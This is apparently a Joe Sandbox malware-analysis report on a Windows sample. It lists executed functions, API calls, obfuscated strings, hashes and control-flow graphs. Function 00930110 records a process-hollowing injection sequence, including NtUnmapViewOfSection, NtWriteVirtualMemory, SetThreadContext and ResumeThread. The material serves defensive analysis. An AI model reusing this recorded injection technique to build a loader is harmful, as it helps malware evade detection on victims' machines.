9180->9194 9183 40785d 9184 407866 9183->9184 9185 407623 __mtinitlocknum 3 API calls 9183->9185 9189 407873 9184->9189 9199 40b805 LeaveCriticalSection 9184->9199 9185->9184 9186->9180 9188 4077ba DecodePointer 9186->9188 9191 4077c9 DecodePointer DecodePointer 9186->9191 9192 40a61a EncodePointer 9186->9192 9193 40a61a EncodePointer 9188->9193 9189->8526 9191->9186 9192->9186 9193->9186 9195 407846 9194->9195 9196 40786c 9194->9196 9195->9179 9198 40b805 LeaveCriticalSection 9195->9198 9200 40b805 LeaveCriticalSection 9196->9200 9198->9183 9199->9189 9200->9195 9202 40a66a 9201->9202 9203 40a698 9202->9203 9204 40a68a TlsFree 9202->9204 9205 40b7ca DeleteCriticalSection 9203->9205 9206 40b7e2 9203->9206 9204->9203 9207 40742e _free 56 API calls 9205->9207 9208 40b7f4 DeleteCriticalSection 9206->9208 9209 40a92c 9206->9209 9207->9203 9208->9206 9209->8046 9219 40a61a EncodePointer 9210->9219 9212 407655 __init_pointers __initp_misc_winsig 9220 40b995 EncodePointer 9212->9220 9214 40767b EncodePointer EncodePointer EncodePointer EncodePointer 9215 40b764 9214->9215 9216 40b76f 9215->9216 9217 40b779 InitializeCriticalSectionAndSpinCount 9216->9217 9218 40aa1d 9216->9218 9217->9216 9217->9218 9218->8153 9218->8154 9219->9212 9220->9214 8018 ac2ad0 8021 ac2ae0 8018->8021 8022 ac2aef 8021->8022 8025 ac3280 8022->8025 8030 ac329b 8025->8030 8026 ac32a4 CreateToolhelp32Snapshot 8027 ac32c0 Module32First 8026->8027 8026->8030 8028 ac32cf 8027->8028 8031 ac2adf 8027->8031 8032 ac2f3f 8028->8032 8030->8026 8030->8027 8033 ac2f6a 8032->8033 8034 ac2f7b VirtualAlloc 8033->8034 8035 ac2fb3 8033->8035 8034->8035 8035->8035 7984 930000 7987 930630 7984->7987 7986 930005 7988 93064c 7987->7988 7990 931577 7988->7990 7993 9305b0 7990->7993 7996 9305dc 7993->7996 7994 9305e2 GetFileAttributesA 7994->7996 7995 93061e 7996->7994 7996->7995 7998 930420 7996->7998 7999 9304f3 7998->7999 8000 9304fa 7999->8000 8001 9304ff CreateWindowExA 7999->8001 8000->7996 8001->8000 8002 930540 PostMessageA 8001->8002 8003 93055f 8002->8003 8003->8000 8005 930110 VirtualAlloc GetModuleFileNameA 8003->8005 8006 930414 8005->8006 8007 93017d CreateProcessA 8005->8007 8006->8003 8007->8006 8009 93025f VirtualFree VirtualAlloc Wow64GetThreadContext 8007->8009 8009->8006 8010 9302a9 ReadProcessMemory 8009->8010 8011 9302e5 VirtualAllocEx NtWriteVirtualMemory 8010->8011 8012 9302d5 NtUnmapViewOfSection 8010->8012 8015 93033b 8011->8015 8012->8011 8013 930350 NtWriteVirtualMemory 8013->8015 8014 93039d WriteProcessMemory Wow64SetThreadContext ResumeThread 8016 9303fb ExitProcess 8014->8016 8015->8013 8015->8014

                                                                                          Executed Functions

                                                                                          Function 004257E0 Relevance: 114.1, APIs: 51, Strings: 14, Instructions: 362threadregistrymemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 4257e0-425804 call 412100 3 425806-42580c 0->3 4 425816-425820 3->4 5 42580e-425814 CharToOemBuffA 3->5 6 425822-425826 GetConsoleProcessList 4->6 7 425828-42582e 4->7 5->4 6->7 8 425842-425849 7->8 9 425830-425836 7->9 8->3 11 42584b 8->11 9->8 10 425838-425840 9->10 10->8 12 42584d-425854 10->12 13 42586b-425875 11->13 12->13 14 425856-425865 WriteProfileStringW 12->14 15 4258c7-4258db 13->15 16 425877-425889 RegisterClassA 13->16 14->13 19 4258e0-4258e6 15->19 17 4258aa-4258c2 call 407468 call 405590 call 407891 16->17 18 42588b-4258a4 SetThreadContext GetFileAttributesExA 16->18 17->15 18->17 21 4258f3-4258fd 19->21 22 4258e8-4258ed 19->22 24 425922-425929 21->24 25 4258ff-425920 GetConsoleAliasW WriteConsoleOutputCharacterA GetFileType 21->25 22->21 24->19 27 42592b-425948 GlobalAlloc 24->27 25->24 29 425a13-425a1e 27->29 30 42594e-42595a 27->30 32 425a20-425a23 29->32 33 425960-425965 30->33 36 425a25-425a33 GetPrivateProfileStringW 32->36 37 425a38-425a39 32->37 34 4259c6-4259d3 call 4252a0 33->34 35 425967-4259c0 GetWindowsDirectoryW SetThreadAffinityMask ReadConsoleOutputCharacterA SetProcessShutdownParameters BuildCommDCBAndTimeoutsW 33->35 42 4259d5-425a05 GetVolumeInformationW GetConsoleAliasA SetProcessShutdownParameters 34->42 43 425a0a-425a0d 34->43 35->34 36->37 37->32 39 425a3b-425a5a 37->39 41 425a60-425a6b 39->41 44 425a93-425a97 41->44 45 425a6d-425a8e AddAtomA GetSystemWindowsDirectoryW DisconnectNamedPipe GetConsoleCursorInfo 41->45 42->43 43->29 43->33 44->41 46 425a99-425ace VirtualProtect call 4255c0 44->46 45->44 49 425ad0-425ada 46->49 50 425adc-425b07 InterlockedDecrement GetCharWidthFloatW ClearEventLogA GlobalUnfix OpenWaitableTimerW 49->50 51 425b0d-425b23 GlobalFlags LocalFlags 49->51 50->51 52 425b30-425b37 51->52 53 425b25-425b2a 51->53 52->49 54 425b39-425c0e LoadLibraryW 52->54 53->52 55 425c14-425d0f GetConsoleCursorInfo SetConsoleCP TerminateProcess FindFirstFileA GetVolumeNameForVolumeMountPointA GetModuleHandleW CreateActCtxA _lclose ReadConsoleW GetNamedPipeHandleStateW GetModuleHandleA CreateEventA ExpandEnvironmentStringsW SetProcessAffinityMask SetTimeZoneInformation ActivateActCtx DeleteVolumeMountPointA 54->55 56 425d15-425d1e 54->56 55->56
                                                                                          APIs
                                                                                          • CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00425814
                                                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425826
                                                                                          • WriteProfileStringW.KERNEL32(masamey,rajuk,wedum), ref: 00425865
                                                                                          • RegisterClassA.USER32(5A1C619F), ref: 0042587C
                                                                                          • SetThreadContext.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042588F
                                                                                          • GetFileAttributesExA.KERNEL32(harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu,00000000,?,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004258A4
                                                                                          • _fputc.LIBCMT ref: 004258AE
                                                                                          • GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258), ref: 00425907
                                                                                          • WriteConsoleOutputCharacterA.KERNEL32(00000000,bevohurabijaso,00000000,00000000,072348D9,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042591C
                                                                                          • GetFileType.KERNEL32(00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00425920
                                                                                          • GlobalAlloc.KERNEL32(00000000,?,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425934
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00425971
                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 00425977
                                                                                          • ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,00000000,072348D9,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042598F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$CharacterFileOutputThreadWrite$AffinityAliasAllocAttributesBuffCharClassContextDirectoryGlobalListMaskProcessProfileReadRegisterStringTypeWindows_fputc
                                                                                          • String ID: bajudomipofomayaramebetec$bevohurabijaso$harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu$masamey$nesubunemujikiyironatayimaba$nifawoxasexasikuducunojuzufufozoluhu$paririzegeyesavimiz$pivajogetecuboxafilubo$pudimutipegizapejo$rajuk$viguzanoba$wedum$wisadugebejazejoweriseb nor$LwP<Mw`Lw
                                                                                          • API String ID: 1579132369-3195660827
                                                                                          • Opcode ID: d877436c784190c928727750bb7d3effe1c5fbbd43bdc0cee339242b01f40efd
                                                                                          • Instruction ID: 5f7f87ac16b498cbc6373e6cf3bd9bd595ac9e1fcbf9491703df2ca55b9bcc60
                                                                                          • Opcode Fuzzy Hash: d877436c784190c928727750bb7d3effe1c5fbbd43bdc0cee339242b01f40efd
                                                                                          • Instruction Fuzzy Hash: 40D1C671644350ABE310DFA0ED86F9B77A4EB48B01F40463AF745EB1E0DAB85584CB6E
                                                                                          Function 00930110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00930156
                                                                                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0093016C
                                                                                          • CreateProcessA.KERNELBASE(?,00000000), ref: 00930255
                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00930270
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00930283
                                                                                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0093029F
                                                                                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 009302C8
                                                                                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 009302E3
                                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00930304
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0093032A
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00930399
                                                                                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 009303BF
                                                                                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 009303E1
                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 009303ED
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00930412
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                          • String ID:
                                                                                          • API String ID: 93872480-0
                                                                                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction ID: 4f2c1ffc1b42a8ad0614e5e96efe88289cf86dce1fb06a548eb0cfe1d66dd647
                                                                                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction Fuzzy Hash: 72B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94
                                                                                          Function 00AC3280 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 99 ac3280-ac3299 100 ac329b-ac329d 99->100 101 ac329f 100->101 102 ac32a4-ac32b0 CreateToolhelp32Snapshot 100->102 101->102 103 ac32c0-ac32cd Module32First 102->103 104 ac32b2-ac32b8 102->104 105 ac32cf-ac32d0 call ac2f3f 103->105 106 ac32d6-ac32de 103->106 104->103 109 ac32ba-ac32be 104->109 110 ac32d5 105->110 109->100 109->103 110->106
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AC32A8
                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00AC32C8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_abd000_e6reA52T4I.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3833638111-0
                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction ID: 74fe069bbfee8d917d72963a056699df594db7bef76686fc98f2ac1d78f719fa
                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction Fuzzy Hash: 94F062326007146FEF203BB9A88DFAAB6E8BF59724F51452CE642915C0DB70E9454A61
                                                                                          Function 00930420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 73 930420-9304f8 75 9304fa 73->75 76 9304ff-93053c CreateWindowExA 73->76 77 9305aa-9305ad 75->77 78 930540-930558 PostMessageA 76->78 79 93053e 76->79 80 93055f-930563 78->80 79->77 80->77 81 930565-930579 80->81 81->77 83 93057b-930582 81->83 84 930584-930588 83->84 85 9305a8 83->85 84->85 86 93058a-930591 84->86 85->80 86->85 87 930593-930597 call 930110 86->87 89 93059c-9305a5 87->89 89->85
                                                                                          APIs
                                                                                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00930533
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                          • API String ID: 716092398-2341455598
                                                                                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction ID: 81bdb3ff6580dddefec5411341675ebd6a3c8ed99155605c9607830823645fd9
                                                                                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction Fuzzy Hash: B6511870D083C8DAEB11CBE8C859BDDBFB6AF51708F144058E5447F286C3BA5A58CB66
                                                                                          Function 009305B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 90 9305b0-9305d5 91 9305dc-9305e0 90->91 92 9305e2-9305f5 GetFileAttributesA 91->92 93 93061e-930621 91->93 94 930613-93061c 92->94 95 9305f7-9305fe 92->95 94->91 95->94 96 930600-93060b call 930420 95->96 98 930610 96->98 98->94
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 009305EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID: apfHQ$o
                                                                                          • API String ID: 3188754299-2999369273
                                                                                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction ID: 9ea48b616e369e8361f440ff1929f93c4ee2a3bc451a730b733f6c5ee01a0c88
                                                                                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction Fuzzy Hash: F4012170C0424CEEDF14DB98C5193AEBFB5AF81308F1481D9D4092B242D7769B58CFA1
                                                                                          Function 00AC2F3F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 112 ac2f3f-ac2f79 call ac3252 115 ac2f7b-ac2fae VirtualAlloc call ac2fcc 112->115 116 ac2fc7 112->116 118 ac2fb3-ac2fc5 115->118 116->116 118->116
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AC2F90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_abd000_e6reA52T4I.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction ID: f9d73a25ec8f844db20eafa8f35ac1c5d224ad53ee8cc7cc66b44a73baa304be
                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction Fuzzy Hash: 2F113F79A00208EFDB01DF98C985E98BBF5AF08350F068094F9489B361D371EA50DF90

                                                                                          Non-executed Functions

                                                                                          Function 00425D20 Relevance: 56.7, APIs: 2, Strings: 30, Instructions: 708COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 134 425d20-426cac 135 426cb1-426cb6 CharUpperA 134->135 135->135 136 426cb8-4272c6 call 4257e0 135->136 138 4272cb-4272d7 136->138 139 4272e9-4272f7 138->139 140 4272d9-4272e3 GetTempPathW 138->140 140->139
                                                                                          APIs
                                                                                          • CharUpperA.USER32(00000000,3ADE7A91,698C5357,41D8CE48,25C1687E,418F6582,698C5357,048B4B8D,17C9A0AF,6F52AFFE,22C9DDBD,566AD047,68316C5B,3158AF5F,1CE65E10,25213482), ref: 00426CB3
                                                                                            • Part of subcall function 004257E0: CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00425814
                                                                                            • Part of subcall function 004257E0: GetConsoleProcessList.KERNEL32(00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425826
                                                                                            • Part of subcall function 004257E0: RegisterClassA.USER32(5A1C619F), ref: 0042587C
                                                                                            • Part of subcall function 004257E0: SetThreadContext.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042588F
                                                                                            • Part of subcall function 004257E0: GetFileAttributesExA.KERNEL32(harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu,00000000,?,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004258A4
                                                                                            • Part of subcall function 004257E0: _fputc.LIBCMT ref: 004258AE
                                                                                            • Part of subcall function 004257E0: GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258), ref: 00425907
                                                                                            • Part of subcall function 004257E0: WriteConsoleOutputCharacterA.KERNEL32(00000000,bevohurabijaso,00000000,00000000,072348D9,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042591C
                                                                                            • Part of subcall function 004257E0: GetFileType.KERNEL32(00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00425920
                                                                                            • Part of subcall function 004257E0: GlobalAlloc.KERNEL32(00000000,?,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425934
                                                                                          • GetTempPathW.KERNEL32(00000000,011C8B1D,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80,07780C44,31630C95,65DCD057,6496216E), ref: 004272E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$CharFile$AliasAllocAttributesBuffCharacterClassContextGlobalListOutputPathProcessRegisterTempThreadTypeUpperWrite_fputc
                                                                                          • String ID: $iEz$9X"e$=)W{$GhB$JG__$Kn6B$O2l[$T(7a$WTE$X!pq$Yx@t$[l1h$\Sj=$`*T$a*oJ$c<z$fPT$gew$hRjT$msX?$o%HQ$ogr($qu|a$w$w ~x$xF$zj\$|59M$~=l@$Wqu
                                                                                          • API String ID: 2287136171-2618368052
                                                                                          • Opcode ID: 6017953b2286c0fa0bd63261c4c2ee6cec5958200163e37f03c58e77bf105344
                                                                                          • Instruction ID: 60c594f9e99f8573c6b91579fb91971125de9a22c0a297299de556f99d693c23
                                                                                          • Opcode Fuzzy Hash: 6017953b2286c0fa0bd63261c4c2ee6cec5958200163e37f03c58e77bf105344
                                                                                          • Instruction Fuzzy Hash: CCA2C7B9609380CFC2B48F6AC1897CEF7E4BF99314F50890CE9DA9A611D73199858F47
                                                                                          Function 004255C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 134fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00425617
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFileInput$AtomCommandFindFirstGlobalLineMoveNameProgressReadWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 2825188472-2435646076
                                                                                          • Opcode ID: be7d79059f30a6632f346b40d48af623ca80fe7e0d0fd30260e4fdf3c4bd5d1c
                                                                                          • Instruction ID: f8bec8c40e0bcd29496fa0cf97ecedeca28e3bc7d84904d8d51d713377df83fc
                                                                                          • Opcode Fuzzy Hash: be7d79059f30a6632f346b40d48af623ca80fe7e0d0fd30260e4fdf3c4bd5d1c
                                                                                          • Instruction Fuzzy Hash: B651D670608351DFD350CF19E984A1BBBF0FB88714F804A2EF599A7260D778AA45CF5A
                                                                                          Function 004255F6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 119fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00425617
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFileInput$AtomCommandFindFirstGlobalLineMoveNameProgressReadWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 2825188472-2435646076
                                                                                          • Opcode ID: 3267d5d4045f681505520417e46d6b00f70a95a090934160b91790928cfe3b43
                                                                                          • Instruction ID: 8dd27025a67b630aea2c51abe9a8d5dc4e0f30f91dd5c75df4b86855399a58bb
                                                                                          • Opcode Fuzzy Hash: 3267d5d4045f681505520417e46d6b00f70a95a090934160b91790928cfe3b43
                                                                                          • Instruction Fuzzy Hash: 2451D670608341DFD354CF18E984A1BB7F0FB88714F804A2EF599A7260D778AA45CF9A
                                                                                          Function 004255F4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 00425617
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
